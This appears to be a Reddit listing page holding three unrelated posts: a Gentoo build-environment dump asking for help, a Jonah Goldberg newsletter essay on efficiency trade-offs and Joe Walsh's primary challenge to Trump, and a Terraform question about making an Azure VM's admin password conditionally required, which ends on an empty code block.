sys-devel/make:           4.2.1-r4::gentoo
sys-kernel/linux-headers: 4.19::gentoo (virtual/os-headers)
sys-libs/glibc:           2.29-r7::gentoo
Repositories:

gentoo
    location: /var/db/repos/gentoo
    sync-type: rsync
    sync-uri: rsync://
    priority: -1000
    sync-rsync-verify-jobs: 1
    sync-rsync-verify-max-age: 24
    sync-rsync-extra-opts:
    sync-rsync-verify-metamanifest: yes

ACCEPT_KEYWORDS="amd64"
ACCEPT_LICENSE="@FREE"
CBUILD="x86_64-pc-linux-gnu"
CFLAGS="-O2 -pipe"
CHOST="x86_64-pc-linux-gnu"
CONFIG_PROTECT="/etc /usr/share/gnupg/qualified.txt"
CONFIG_PROTECT_MASK="/etc/ca-certificates.conf /etc/env.d /etc/gconf /etc/gentoo-release /etc/sandbox.d /etc/terminfo"
CXXFLAGS="-O2 -pipe"
DISTDIR="/var/cache/distfiles"
ENV_UNSET="DBUS_SESSION_BUS_ADDRESS DISPLAY GOBIN PERL5LIB PERL5OPT PERLPREFIX PERL_CORE PERL_MB_OPT PERL_MM_OPT XAUTHORITY XDG_CACHE_HOME XDG_CONFIG_HOME XDG_DATA_HOME XDG_RUNTIME_DIR"
FCFLAGS="-O2 -pipe"
FEATURES="assume-digests binpkg-docompress binpkg-dostrip binpkg-logs config-protect-if-modified distlocks ebuild-locks fixlafiles ipc-sandbox merge-sync multilib-strict network-sandbox news parallel-fetch pid-sandbox preserve-libs protect-owned sandbox sfperms strict unknown-features-warn unmerge-logs unmerge-orphans userfetch userpriv usersandbox usersync xattr"
FFLAGS="-O2 -pipe"
GENTOO_MIRRORS=""
LANG="C"
LDFLAGS="-Wl,-O1 -Wl,--as-needed"
MAKEOPTS="-j3"
PKGDIR="/var/cache/binpkgs"
PORTAGE_CONFIGROOT="/"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --omit-dir-times --compress --force --whole-file --delete --stats --human-readable --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --exclude=/.git"
PORTAGE_TMPDIR="/var/tmp"
USE="acl amd64 berkdb bzip2 cli crypt cxx dri fortran gdbm iconv ipv6 libtirpc multilib ncurses nls nptl openmp pam pcre readline seccomp split-usr ssl tcpd unicode wayland xattr zlib"
ABI_X86="64"
ADA_TARGET="gnat_2018"
ALSA_CARDS="ali5451 als4000 atiixp atiixp-modem bt87x ca0106 cmipci emu10k1x ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 intel8x0m maestro3 trident usb-audio via82xx via82xx-modem ymfpci"
APACHE2_MODULES="authn_core authz_core socache_shmcb unixd actions alias auth_basic authn_alias authn_anon authn_dbm authn_default authn_file authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cgi cgid dav dav_fs dav_lock deflate dir disk_cache env expires ext_filter file_cache filter headers include info log_config logio mem_cache mime mime_magic negotiation rewrite setenvif speling status unique_id userdir usertrack vhost_alias"
CALLIGRA_FEATURES="karbon sheets words"
COLLECTD_PLUGINS="df interface irq load memory rrdtool swap syslog"
CPU_FLAGS_X86="mmx mmxext sse sse2"
ELIBC="glibc"
GPSD_PROTOCOLS="ashtech aivdm earthmate evermore fv18 garmin garmintxt gpsclock greis isync itrax mtk3301 nmea ntrip navcom oceanserver oldstyle oncore rtcm104v2 rtcm104v3 sirf skytraq superstar2 timing tsip tripmate tnt ublox ubx"
INPUT_DEVICES="libinput keyboard mouse"
KERNEL="linux"
LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text"
LIBREOFFICE_EXTENSIONS="presenter-console presenter-minimizer"
OFFICE_IMPLEMENTATION="libreoffice"
PHP_TARGETS="php7-2"
POSTGRES_TARGETS="postgres10 postgres11"
PYTHON_SINGLE_TARGET="python3_6"
PYTHON_TARGETS="python2_7 python3_6"
RUBY_TARGETS="ruby24 ruby25"
USERLAND="GNU"
VIDEO_CARDS="amdgpu fbdev intel nouveau radeon radeonsi vesa dummy v4l"
XTABLES_ADDONS="quota2 psd pknock lscan length2 ipv4options ipset ipp2p iface geoip fuzzy condition tee tarpit sysrq steal rawnat logmark ipmark dhcpmac delude chaos account"
Unset: CC, CPPFLAGS, CTARGET, CXX, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LC_ALL, LINGUAS, PORTAGE_BINHOST, PORTAGE_BUNZIP2_COMMAND, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS
=================================================================
Package Settings
=================================================================
dev-util/cmake-3.14.6::gentoo was built with the following:
USE="ncurses -doc -emacs -qt5 -system-jsoncpp -test" ABI_X86="(64)"
FEATURES="assume-digests binpkg-docompress binpkg-dostrip binpkg-logs buildpkg config-protect-if-modified distlocks ebuild-locks fail-clean fixlafiles ipc-sandbox merge-sync multilib-strict network-sandbox parallel-fetch preserve-libs protect-owned sandbox selinux sesandbox sfperms strict unknown-features-warn unmerge-logs unmerge-orphans userfetch userpriv usersandbox usersync xattr"
Thank you for looking at this! Any guidance would be appreciated!
submitted by ragnarok189 to Gentoo [link] [comments]

Joe Walsh Will Not Save Us (G-File)

Dear Reader (including the poor Biden staffers who have to white-knuckle their armrests when not sucking down unfiltered Marlboros every time Joe Biden gives an interview),
If you’ve never heard the Milton Friedman shovels and spoons story, you will (and I don’t just mean here). Because everyone on the right tells some version of it at some point. The other Uncle Miltie (i.e., not the epically endowed comedic genius) goes to Asia or Africa or South America and is taken on a tour of some public works project in a developing country. Hundreds of laborers are digging with shovels. Milton asks the official in charge something like, “Why use shovels when earth moving equipment would be so much more efficient?”
The official replies that this is a jobs program and using shovels creates more jobs.
Friedman guffaws and asks, “In that case: Why not use spoons?”
The story might not be true, but the insight is timeless.
Here’s another story: When I was in college, we were debating in intro to philosophy the differences between treating men and women “equally” versus treating them the “same.” At first blush, the two things sound synonymous, but they’re not (indeed the difference illuminates the chasm of difference between classical liberalism and socialism, but that’s a topic for another day). I pointed out that there were some firefighter programs that had different physical requirements for male applicants and female ones (this was before it was particularly controversial—outside discussions of Foucault—to assume there were clear differences between sexes). Female applicants had to complete an obstacle course carrying a 100-pound dummy, but men had to carry a 200-pound dummy, or something like that. A puckish freshperson named Jonah Goldberg said: “I don’t really care if a firefighter is a man, a woman, or a gorilla, I’d just like them to be able to rescue me from a fire.”
A woman sitting in front of me wheeled around and womansplained to me that “you can always just hire two women.”
I shot back something like, “You could also hire 17 midgets, that’s not the point.”
(I apologize for using the word midget, which wasn’t on the proscribed terms list at the time.)
But here’s the thing: Sometimes it is the point. Whether you’re talking about spoons or little people, the case for efficiency is just one case among many. Don’t get me wrong, I think it’s an important one, but it’s not the only one. Sometimes older children are told to bring their little brothers or sisters along on some trip. They’ll complain, “But they’ll just slow us down!” or, “But they aren’t allowed on the big kid rides.” Parents understand the point, but they are not prioritizing efficiency over love. Or, they’re prioritizing a different efficiency: Not being stuck with a little kid who’s crying all day because he or she was left behind.
One of my favorite scenes in the movie Searching for Bobby Fischer is when the chess tutor Bruce Pandolfini, played by Ben Kingsley, tells the chess prodigy’s parents that they have to forbid their son from playing pickup chess in the park because he learns bad chess habits there. The mom says “Not playing in the park would kill him. He loves it.”
Kingsley replies, accurately, that it “just makes my job harder.”
And the mom says, “Then your job is harder.”
I love that. I love it precisely because it recognizes that good parents recognize that there are trade-offs in life and that the best option isn’t always the most efficient one.
This is one of those places where you can see how wisdom and expertise can diverge from one another.
The Unity of Goodness
Efficiency can mean different things in different contexts. In business, it means profit maximization (or cost reduction, which is often the same thing). In sports, it means winning. Always giving the ball to the best player annoys the other players who want their own shot at glory, but so long as he can be counted on to score, most coaches will err on the side of winning. Starting one-legged players will wildly improve a basketball team’s diversity score, but it’s unlikely to improve the score that matters to coaches—or fans.
I’ve long argued that there’s something in the progressive mind that dislikes this whole line of thinking. They often tend to find the idea of trade-offs to be immoral or offensive. I call it the “unity of goodness” worldview. Once you develop an ear for it, you can hear it everywhere. “I refuse to believe that economic growth has to come at the expense of the environment.” “There’s no downside to putting women in combat.” “I don’t want to live in a society where families have to choose between X and Y,” or “I for one reject the idea that we have to sacrifice security for freedom—or freedom for security.” Both Bill Clinton and Barack Obama were masters at declaring that all hard choices were “false choices”—as if only mean-spirited people would say you can’t have your cake and eat it too.
Saint Greta
Nowhere is this mindset more on display than in environmentalism. Everyone hawking the Green New Deal insists that it’s win-win all the way down. It’s Bastiat’s broken window parable on an industrialized scale. Spending trillions to switch to less efficient forms of energy will boost economic growth and create jobs, they insist. I’d have much more respect for these arguments if they simply acknowledged that doing a fraction of what they want will come at considerable cost.
Consider Greta Thunberg, the latest child redeemer of the climate change movement. She hates planes because they spew CO2. That’s why she sailed from Sweden to a conference in New York. As symbolism, it worked, at least for the people who already agree with her. But in economic terms, she might as well have raised the Spoon Banner off the main mast of her multi-million-dollar craft (that may have a minimal carbon footprint now, but required an enormous carbon down-payment to create). The organizers of this stunt had to fly two people to New York to bring the ship back across the Atlantic. And scores of reporters flew across the Atlantic to cover her heroic act of self-denial. Her nautical virtue signaling came at a price.
The organizers insist that they will buy carbon offsets to compensate for the damage done. But that’s just clever accounting. The cost is still real. And that’s not the only cost. It took her fifteen days to get to America. In other words, she actually proved the point of many of her critics. Fossil fuels come with costs all their own—geopolitical, environmental, etc.—but the upside of those downsides is far greater efficiency. If you want to get across the Atlantic in seven hours instead of two weeks, you need fossil fuels. The efficiency of modern technology reduces costs by giving human beings more time to do other stuff.
The Conservative Planners
The unity of goodness mindset has been spreading to the right these days as well. The new conservative critics of the free market see the efficiency of the market as a threat to other good things. And they’re right, as Joseph Schumpeter explained decades ago. For instance, just as earth-moving equipment replaces ditch-diggers in the name of efficiency, robots replace crane operators, and the communities that depended on those jobs often suffer as a result.
I have no quarrel with this observation. My problem is with the way they either sell their program as cost-free, or pretend that the right experts can run things better from Washington. They know which jobs or industries need the state to protect them from the market. They know how to run Facebook or Google to improve the Gross National Virtue Index. Many of the same people who once chuckled at the Spoons story now nod sagely. I don’t mean to say that there’s no room for government to regulate economic affairs. But I am at a loss as to why I should suspend my skepticism for right-wingers when they work from the same assumptions of the left-wingers I’ve been arguing with for decades.
Embracing Trumpism to Own Trump
Instead I want—or I guess need—to talk about another trade-off. I’ve been very reluctant to weigh in on the Joe Walsh project for a bunch of reasons. The biggest is that I am friends with some of the people cheering it on. But I think I have to offer my take.
I don’t get it.
Oh, I certainly understand the desire to see a primary challenger to Trump. I share that desire. And I understand the political calculation behind the effort. It’s like when one little league team brings in some dismayingly brawny and hirsute player from Costa Rica as a ringer. The other teams feel like they have to get their own 22-year-olds with photoshopped birth certificates in order to compete. My friend Bill Kristol is convinced that Trump must be defeated and that Walsh is just the mongoose to take on the Cobra-in-Chief.
I try not to recycle metaphors or analogies too much, but this seems like another example of a Col. Nicholson move. As I’ve written before, Col. Nicholson was the Alec Guinness character in The Bridge on the River Kwai. The commanding officer of a contingent of mostly British POWs being held by the Japanese, Nicholson at first follows the rules and refuses to cooperate with his captors in their effort to use British captives as slave labor for a bridge project. But then his pride kicks in and he decides he will show the Japanese what real soldiering is like, agreeing to build the bridge as a demonstration of British superiority in civil engineering. [Spoiler alert] It’s only at the end of the film that he realizes that building the bridge may have been a kind of short-sighted moral victory, but in reality he was helping the Japanese kill Allied troops because the bridge was going to be used for shipping Japanese troops and ammunition. When this realization finally arrives, he exclaims, “My God, what have I done?”
Walsh’s primary brief against Trump is that Trump is temperamentally unfit for office and a con man. Fair enough. But he has to focus his indictment on Trump’s erratic behavior. Why? Because he’s a terrible spokesman for much of the rest of the case against Trump. I may not call myself “Never Trump” any more, but I was in 2016. And back then, the argument against Trump wasn’t simply that he was erratic. It was also that he wasn’t a conservative, that he happily dabbled in racism and bigotry, and that he was crude, ill-informed, and narcissistically incapable of putting his personal interests and ego aside for the good of the country. I’m sure I’m leaving a few other things out. But you get the point.
Walsh may be sincere in his remorse over all the racist and incendiary things he said in the very recent past. He may regret supporting his anti-Semitic friend Paul Nehlen, though I haven’t found evidence of that. But none of that history should be seen as qualifications for the presidency, the Republican nomination, or support from conservatives.
And yet, it is precisely these things that make him attractive to his conservative supporters. Trump is an entertainer who trolls his enemies with offensive statements for attention, so let’s find someone who does the exact same thing!
Walsh may have been a one-term congressman, but his true vocation was as a shock-jock trolling provocateur. It’s ironic. As I’ve argued countless times, much of Trump’s bigotry in 2016 stemmed less from any core convictions than from a deep belief that the GOP’s base voters were bigoted and he needed to feed them red meat. Trump's reluctance to repudiate David Duke derived primarily from his ridiculous assumption that Duke had a large constituency he didn’t want to offend. He may have believed the Birther stuff, but he peddled it because that’s what his fans wanted. And Joe Walsh was one of those fans.
It may also be true that Walsh never really believed most of the bilge he was peddling and that he was doing the same thing Trump did—feeding the trolls—on a smaller scale. But if that’s the case, then he’s a con man, too.
I don’t want to beat up on Walsh too much because, again, his epiphany may be sincere. There are lots of people who pushed certain arguments too far only to recognize that the payoff was Trump and the transformation of conservatism into a form of right-wing identity politics. There are a lot of Col. Nicholsons out there. And I have too much respect for Bill Kristol to believe that he would lend his support to someone he believed to be as bigoted as the man Walsh seemed to be a few years ago.
But from where I sit, the prize we should keep our eyes on isn’t defeating Trump; it’s keeping conservatism from succumbing to Trumpism after he’s gone. This isn’t easy, and no tactic is guaranteed to be successful. We’ve never been here before. My own approach is to agree with Trump policies when I think they’re right—judges, buying Greenland, etc.—and to disagree when they’re wrong. My own crutch is to simply tell the truth as I see it, regardless of whether it fits into some larger political agenda or strategy. Truth is always a legitimate defense of any statement.
But for those who see themselves as political players as well as public intellectuals, I think this is a terrible mistake. Intellectually and morally, the case for continued opposition to—or skepticism about—Trump cannot, or rather must not, be reduced to simple Trump hatred. But by rallying around Walsh—instead of, say, Mark Sanford, or Justin Amash, or, heh, General Mattis—that’s what it looks like. Because you can’t say, “I’m standing on principle in my opposition to a bigoted troll and con man as the leader of my party and my country and that’s why I am supporting a less successful bigoted troll and con man for president.” Walsh isn’t a conservative alternative to Trump; he’s an alternative version of Trump. And his candidacy only makes sense if you take the “binary choice” and “Flight 93” logic of 2016 and cast Trump in the role of Hillary.
Let’s imagine the Walsh gambit works beyond anyone’s dreams and Joe Walsh ends up getting the GOP nomination (a fairly ludicrous thought experiment, I know). If so, I have no doubt that my friend Bill Kristol will say, a la Col. Nicholson, “My God, what have I done.”
Various & Sundry
Canine Update: It’s good to be home. The beasts were delighted to see us. Everything is settling back to normal, except for one intriguing development. I think Zoë has finally had enough with Pippa’s tennis ball routine. The other day on the midday walk with the pack, Kirsten managed to film Zoë putting an end to the tennis ball shenanigans. She took the ball and buried it. It was, to use an inapt phrase, a baller move—and she was unapologetic about it. Maybe she just didn’t like all the commotion with the other dogs, because she’s tolerant of the tennis ball stuff again. Or maybe she was being protective of her sister given that many of the other dogs in the pack are known thieves. Regardless, they’re doing well and having fun.
If you haven’t tuned into The Remnant lately, please give it another try. The first episode of the week was with Niall Ferguson and the feedback has been great. The latest episode is with my friend and AEI colleague Adam White on all things constitutional. Word of mouth is really important in building up audiences, so if you can spread the word about The Remnant or this “news”letter, I’d be grateful.
submitted by Sir-Matilda to tuesday [link] [comments]

How to make a variable optional or required based on a condition?

I have the following configuration block for an Azure Virtual Machine.
terraform {
  required_version = ">= 0.12.0"
  required_providers {
    azurerm = ">= 1.33.0"
    random  = ">=2.2"
  }
}

locals {
  os_type          = substr(var.image_reference_publisher, 0, 9) == "Microsoft" ? "Windows" : "Linux"
  dynamic_linux    = local.os_type == "Linux" ? { dummy_create = true } : {}
  dynamic_windows  = local.os_type == "Windows" ? { dummy_create = true } : {}
  dynamic_ssh_keys = var.disable_password_authentication == true ? { dummy_create = true } : {}
}

resource "azurerm_resource_group" "vm" {
  name     = var.resource_group_name
  location = var.location
  tags     = var.tags
}

resource "random_id" "vm-sa" {
  keepers = {
    vm_name = var.vm_name
  }
  byte_length = 6
}

resource "azurerm_storage_account" "vm-sa" {
  count                    = var.boot_diagnostics == true ? 1 : 0
  name                     = "bootdiag${lower(random_id.vm-sa.hex)}"
  resource_group_name      = azurerm_resource_group.vm.name
  location                 = var.location
  account_tier             = var.boot_diagnostics_sa_tier
  account_replication_type = var.boot_diagnostics_sa_replication_type
  tags                     = var.tags
}

resource "azurerm_availability_set" "vm" {
  count                        = var.availability_set == true ? 1 : 0
  name                         = "avset"
  location                     = azurerm_resource_group.vm.location
  resource_group_name          = azurerm_resource_group.vm.name
  platform_fault_domain_count  = var.platform_fault_domain_count
  platform_update_domain_count = var.platform_update_domain_count
  managed                      = var.managed
  tags                         = var.tags
}

resource "azurerm_network_interface" "vm" {
  name                          = "nic"
  location                      = azurerm_resource_group.vm.location
  resource_group_name           = azurerm_resource_group.vm.name
  network_security_group_id     = var.network_security_group_id
  enable_accelerated_networking = var.enable_accelerated_networking

  ip_configuration {
    name                          = "ipconfig"
    subnet_id                     = var.subnet_id
    private_ip_address_allocation = var.private_ip_address_allocation
    private_ip_address            = var.private_ip_address_allocation == "Static" ? var.private_ip_address : ""
    private_ip_address_version    = var.private_ip_address_version
    # Guard on the count flag; indexing azurerm_public_ip.vm[0] directly fails
    # when enable_public_ip is false and no instance exists.
    public_ip_address_id          = var.enable_public_ip ? azurerm_public_ip.vm[0].id : null
    primary                       = var.primary
  }

  tags = var.tags
}

resource "azurerm_public_ip" "vm" {
  count                   = var.enable_public_ip == true ? 1 : 0
  name                    = "Test-publicIP"
  location                = var.location
  resource_group_name     = azurerm_resource_group.vm.name
  allocation_method       = var.public_ip_address_allocation
  domain_name_label       = var.domain_name_label
  sku                     = var.public_ip_sku
  ip_version              = var.public_ip_version
  idle_timeout_in_minutes = var.idle_timeout_in_minutes
  reverse_fqdn            = var.reverse_fqdn
  public_ip_prefix_id     = var.public_ip_prefix_id
  zones                   = var.zones
  tags                    = var.tags
}

resource "azurerm_virtual_machine" "vm" {
  name                             = var.vm_name
  location                         = var.location
  resource_group_name              = var.resource_group_name
  network_interface_ids            = [azurerm_network_interface.vm.id]
  vm_size                          = var.vm_size
  availability_set_id              = var.availability_set == true ? azurerm_availability_set.vm[0].id : null
  delete_os_disk_on_termination    = var.delete_os_disk_on_termination
  delete_data_disks_on_termination = var.delete_data_disks_on_termination

  storage_image_reference {
    publisher = var.image_reference_publisher
    offer     = var.image_reference_offer
    sku       = var.image_reference_sku
    version   = var.image_reference_version
    id        = var.storage_image_reference_id
  }

  storage_os_disk {
    name                      = "os-disk"
    caching                   = var.os_disk_caching
    create_option             = var.os_disk_create_option
    managed_disk_id           = var.os_managed_disk_id
    managed_disk_type         = var.os_disk_managed_disk_type
    disk_size_gb              = var.os_disk_size_gb
    image_uri                 = var.os_disk_image_uri
    vhd_uri                   = var.os_disk_vhd_uri
    write_accelerator_enabled = var.os_disk_write_accelerator_enabled
  }

  os_profile {
    computer_name  = var.computer_name
    admin_username = var.admin_username
    admin_password = var.admin_password
    custom_data    = var.custom_data
  }

  dynamic "os_profile_linux_config" {
    for_each = local.dynamic_linux
    content {
      disable_password_authentication = var.disable_password_authentication
      dynamic "ssh_keys" {
        for_each = local.dynamic_ssh_keys
        content {
          path     = "/home/${var.admin_username}/.ssh/authorized_keys"
          key_data = var.ssh_key
        }
      }
    }
  }

  dynamic "os_profile_windows_config" {
    for_each = local.dynamic_windows
    content {
      provision_vm_agent        = var.provision_vm_agent
      enable_automatic_upgrades = var.enable_automatic_upgrades
      timezone                  = var.timezone
    }
  }

  boot_diagnostics {
    enabled     = var.boot_diagnostics
    storage_uri = var.boot_diagnostics == true ? azurerm_storage_account.vm-sa[0].primary_blob_endpoint : ""
  }

  tags = var.tags
}

resource "azurerm_virtual_machine_data_disk_attachment" "vm" {
  count                     = var.data_disk == true ? 1 : 0
  managed_disk_id           = var.data_managed_disk_id
  virtual_machine_id        = azurerm_virtual_machine.vm.id
  lun                       = var.lun
  caching                   = var.data_disk_caching
  write_accelerator_enabled = var.data_disk_write_accelerator_enabled
}
# Resource Group
variable "resource_group_name" {
  description = "Resource group name."
  type        = string
  default     = "mytest-rg"
}
variable "location" {
  description = "Location."
  type        = string
  default     = "canadacentral"
}

# Storage Account
variable "boot_diagnostics_sa_tier" {
  description = "(Required) Defines the Tier to use for this storage account. Valid options are Standard and Premium. For FileStorage accounts only Premium is valid. Changing this forces a new resource to be created."
  type        = string
  default     = "Standard"
}
variable "boot_diagnostics_sa_replication_type" {
  description = "(Required) Defines the type of replication to use for this storage account. Valid options are LRS, GRS, RAGRS and ZRS."
  type        = string
  default     = "LRS"
}

# Virtual Machine
variable "vm_name" {
  description = "(Required) Specifies the name of the Virtual Machine. Changing this forces a new resource to be created."
  type        = string
}
variable "vm_size" {
  description = "(Required) Specifies the size of the Virtual Machine."
  type        = string
  default     = "Standard_DS1_V2"
}
variable "boot_diagnostics" {
  description = "Set this variable to 'true' to enable boot diagnostics for your Virtual Machine."
  type        = bool
  default     = false
}
variable "delete_os_disk_on_termination" {
  description = "(Optional) Should the OS Disk (either the Managed Disk / VHD Blob) be deleted when the Virtual Machine is destroyed? Defaults to false."
  type        = bool
  default     = false
}
variable "delete_data_disks_on_termination" {
  description = "(Optional) Should the Data Disks (either the Managed Disks / VHD Blobs) be deleted when the Virtual Machine is destroyed? Defaults to false."
  type        = bool
  default     = false
}
variable "image_reference_publisher" {
  description = "(Required) Specifies the publisher of the image used to create the virtual machine. Changing this forces a new resource to be created."
  type        = string
}
variable "image_reference_offer" {
  description = "(Required) Specifies the offer of the image used to create the virtual machine. Changing this forces a new resource to be created."
  type        = string
}
variable "image_reference_sku" {
  description = "(Required) Specifies the SKU of the image used to create the virtual machine. Changing this forces a new resource to be created."
  type        = string
}
variable "image_reference_version" {
  description = "(Optional) Specifies the version of the image used to create the virtual machine. Changing this forces a new resource to be created."
  type        = string
  default     = "latest"
}
variable "storage_image_reference_id" {
  description = "(Required) Specifies the ID of the Custom Image which the Virtual Machine should be created from. Changing this forces a new resource to be created."
  default     = null
}
variable "os_disk_caching" {
  description = "(Optional) Specifies the caching requirements for the Data Disk. Possible values include None, ReadOnly and ReadWrite."
  type        = string
  default     = "ReadWrite"
}
variable "os_disk_create_option" {
  description = "(Required) Specifies how the data disk should be created. Possible values are Attach, FromImage and Empty."
  type        = string
  default     = "FromImage"
}
variable "os_managed_disk_id" {
  description = "(Optional) Specifies the ID of an Existing Managed Disk which should be attached to this Virtual Machine. When this field is set create_option must be set to Attach."
  default     = null
}
variable "os_disk_managed_disk_type" {
  description = "(Optional) Specifies the type of managed disk to create. Possible values are either Standard_LRS, StandardSSD_LRS, Premium_LRS or UltraSSD_LRS."
  default     = null
}
variable "os_disk_size_gb" {
  description = "(Optional) Specifies the size of the OS Disk in gigabytes."
  type        = number
  default     = 127
}
variable "os_disk_image_uri" {
  description = "(Optional) Specifies the Image URI in the format publisherName:offer:skus:version. This field can also specify the VHD uri of a custom VM image to clone. When cloning a Custom (Unmanaged) Disk Image the os_type field must be set."
  default     = null
}
variable "os_disk_write_accelerator_enabled" {
  description = "(Optional) Specifies if Write Accelerator is enabled on the disk. This can only be enabled on Premium_LRS managed disks with no caching and M-Series VMs. Defaults to false."
  type        = bool
  default     = false
}
variable "os_disk_vhd_uri" {
  description = "(Optional) Specifies the URI of the VHD file backing this Unmanaged OS Disk. Changing this forces a new resource to be created."
  default     = null
}
variable "computer_name" {
  description = "(Required) Specifies the host name of the Virtual Machine."
  type        = string
}
variable "admin_username" {
  description = "(Required) Specifies the name of the local administrator account."
  type        = string
}
variable "admin_password" {
  description = "(Required for Windows, Optional for Linux) The password associated with the local administrator account. NOTE: 'admin_password' must be between 6-72 characters long and must satisfy at least 3 of password complexity requirements from the following: 1. Contains an uppercase character 2. Contains a lowercase character 3. Contains a numeric digit 4. Contains a special character"
  default     = null
}
variable "custom_data" {
  description = "(Optional) Specifies custom data to supply to the machine. On Linux-based systems, this can be used as a cloud-init script. On other systems, this will be copied as a file on disk. Internally, Terraform will base64 encode this value before sending it to the API. The maximum length of the binary array is 65535 bytes."
  default     = null
}
variable "disable_password_authentication" {
  description = "(Required) Specifies whether password authentication should be disabled. If set to false, an admin_password must be specified."
  type        = bool
  default     = false
}
variable "ssh_key" {
  description = "(Required) The Public SSH Key which should be written to the path defined in the ssh_key block."
  default     = ""
}
variable "provision_vm_agent" {
  description = "(Optional) Should the Azure Virtual Machine Guest Agent be installed on this Virtual Machine? Defaults to false."
  type        = bool
  default     = true
}
variable "enable_automatic_upgrades" {
  description = "(Optional) Are automatic updates enabled on this Virtual Machine? Defaults to false."
  type        = bool
  default     = false
}
variable "timezone" {
  description = "(Optional) Specifies the time zone of the virtual machine, the possible values are defined"
  default     = null
}
variable "winrm_protocol" {
  description = "(Required) Specifies the protocol of listener. Possible values are HTTP or HTTPS."
  default     = null
}
variable "winrm_certificate_url" {
  description = "(Optional) The ID of the Key Vault Secret which contains the encrypted Certificate which should be installed on the Virtual Machine. This certificate must also be specified in the vault_certificates block within the os_profile_secrets block."
  default     = null
}

# Availability Set
variable "availability_set" {
  description = "Set this variable to 'true' to add your Virtual Machine to an availability set."
  type        = bool
  default     = true
}
variable "platform_update_domain_count" {
  description = "(Optional) Specifies the number of update domains that are used. Defaults to 5. NOTE: The number of Update Domains varies depending on which Azure Region you're using."
  type        = number
  default     = 2
}
variable "platform_fault_domain_count" {
  description = "(Optional) Specifies the number of fault domains that are used. Defaults to 3. NOTE: The number of Fault Domains varies depending on which Azure Region you're using."
  type        = number
  default     = 2
}
variable "proximity_placement_group_id" {
  description = "(Optional) The ID of the Proximity Placement Group to which this Virtual Machine should be assigned. Changing this forces a new resource to be created."
  type        = string
  default     = null
}
variable "managed" {
  description = "(Optional) Specifies whether the availability set is managed or not. Possible values are true (to specify aligned) or false (to specify classic). Default is false."
  type        = bool
  default     = true
}

# Public IP
variable "enable_public_ip" {
  description = "Set this variable to 'true' to attach a Public IP to the Network Interface."
  type        = bool
  default     = true
}
variable "public_ip_sku" {
  description = "(Optional) The SKU of the Public IP. Accepted values are Basic and Standard. Defaults to Basic."
  type        = string
  default     = "Basic"
}
variable "public_ip_address_allocation" {
  description = "(Required) Defines the allocation method for this IP address. Possible values are Static or Dynamic."
  type        = string
  default     = "Static"
}
variable "public_ip_version" {
  description = "(Optional) The IP Version to use, IPv6 or IPv4."
  type        = string
  default     = "IPv4"
}
variable "idle_timeout_in_minutes" {
  description = "(Optional) Specifies the timeout for the TCP idle connection. The value can be set between 4 and 30 minutes."
  type        = number
  default     = 4
}
variable "domain_name_label" {
  description = "(Optional) Label for the Domain Name. Will be used to make up the FQDN. If a domain name label is specified, an A DNS record is created for the public IP in the Microsoft Azure DNS system."
  type        = string
  default     = null
}
variable "reverse_fqdn" {
  description = "(Optional) A fully qualified domain name that resolves to this public IP address. If the reverseFqdn is specified, then a PTR DNS record is created pointing from the IP address in the domain to the reverse FQDN."
  type        = string
  default     = null
}
variable "public_ip_prefix_id" {
  description = "(Optional) If specified then public IP address allocated will be provided from the public IP prefix resource."
  type        = string
  default     = null
}
variable "zones" {
  description = "(Optional) A collection containing the availability zone to allocate the Public IP in."
  default     = null
}

# Network Interface
variable "network_security_group_id" {
  description = "(Optional) The ID of the Network Security Group to associate with the network interface."
  type        = string
  default     = ""
}
variable "enable_accelerated_networking" {
  description = "(Optional) Enables Azure Accelerated Networking using SR-IOV. Only certain VM instance sizes are supported. Defaults to false."
  type        = bool
  default     = false
}
variable "dns_servers" {
  description = "(Optional) List of DNS servers IP addresses to use for this NIC, overrides the VNet-level server list."
  type        = list(string)
  default     = [""]
}
variable "subnet_id" {
  description = "(Optional) Reference to a subnet in which this NIC has been created. Required when private_ip_address_version is IPv4."
  type        = string
  default     = ""
}
variable "private_ip_address" {
  description = "(Optional) Static IP Address."
  default     = null
}
variable "private_ip_address_allocation" {
  description = "(Required) Defines how a private IP address is assigned. Options are 'Static' or 'Dynamic'."
  type        = string
  default     = "Dynamic"
}
variable "private_ip_address_version" {
  description = "(Optional) The IP Version to use. Possible values are IPv4 or IPv6. Defaults to IPv4."
  type        = string
  default     = "IPv4"
}
variable "primary" {
  description = "(Optional) Is this the Primary Network Interface? If set to true this should be the first ip_configuration in the array."
  type        = bool
  default     = true
}

# Virtual Machine Data Disk Attachment
variable "data_disk" {
  description = "Set this variable to 'true' to attach a data disk."
  type        = bool
  default     = false
}
variable "virtual_machine_id" {
  description = "(Required) The ID of the Virtual Machine to which the Data Disk should be attached. Changing this forces a new resource to be created."
  default     = null
}
variable "data_managed_disk_id" {
  description = "(Required) The ID of an existing Managed Disk which should be attached. Changing this forces a new resource to be created."
  default     = ""
}
variable "lun" {
  description = "(Required) The Logical Unit Number of the Data Disk, which needs to be unique within the Virtual Machine. Changing this forces a new resource to be created."
  type        = number
  default     = 10
}
variable "data_disk_caching" {
  description = "(Required) Specifies the caching requirements for this Data Disk. Possible values include None, ReadOnly and ReadWrite."
  type        = string
  default     = "ReadWrite"
}
variable "data_disk_create_option" {
  description = "(Optional) The Create Option of the Data Disk, such as Empty or Attach. Defaults to Attach. Changing this forces a new resource to be created."
  type        = string
  default     = "Attach"
}
variable "data_disk_write_accelerator_enabled" {
  description = "(Optional) Specifies if Write Accelerator is enabled on the disk. This can only be enabled on Premium_LRS managed disks with no caching and M-Series VMs. Defaults to false."
  type        = bool
  default     = false
}

# Commons
variable "tags" {
  description = "(Optional) A mapping of tags to assign to the resource."
  type        = map(string)
  default = {
    CreatedBy = "Terraform"
  }
}
I want to enforce that the variable admin_password is defined when disable_password_authentication is set to false. If I set the admin_password default to null, it won't prompt for the password; and if I omit the default, it prompts for the password even when disable_password_authentication is set to true.
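One workaround is to fail the plan from a local. This is only a sketch, not part of the module above: the `validate_admin_password` local and the `tobool()` trick are my own, and it assumes classic Terraform behavior where a variable's `validation` block cannot reference other variables (recent Terraform releases lift that restriction and would express this more directly).

```hcl
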